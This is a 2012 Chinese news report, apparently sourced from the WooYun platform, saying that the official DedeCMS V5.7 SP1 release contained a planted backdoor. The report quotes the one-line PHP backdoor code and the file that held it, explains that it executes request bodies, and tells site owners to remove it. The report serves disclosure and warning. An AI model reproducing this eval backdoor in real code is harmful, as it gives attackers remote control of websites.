Dedecms官方被曝疑似植入后门

发表于2012-03-22 11:24:58来源于乌云网

次点击[大] [中] [小] [打印] [关闭窗口] [评论]

昨日，乌云漏洞平台发布最新报告称，著名开源建站软件Dedecms V5.7 SP1正式版被植入后门，通过该后门可成功入侵并控制使用dedecms的网站。

Dedecms被曝植入后门（站长之家配图）

据乌云报告，被植入的后门是在/include/shopcar.class.php文件中，被植入的代码为@eval(file_get_contents(‘php://input’));，乌云介绍称，通过该后门可成功入侵dedecms网站。有网友对植入的该后门予以证实，称其在2012-3-18 19:08下载的DedeCMS-V5.7-UTF8-SP1.tar.gz 有此代码。
据了解，@eval(file_get_contents(‘php://input’));是将请求的数据流作为脚本语言执行，通过该后门，可以上传PHP后门来控制整个网站。使用Dedecms V5.7 SP1正式版建站的站长，需立即对后门代码进行删除，以保护网站安全。
截至目前止，织梦官方暂未对此事进行澄清。

相关热词搜索：Dedecms后面漏洞乌云

上一篇：微软：黑客利用Windows漏洞传播Duqu病毒

下一篇：网传腾讯开始封杀外挂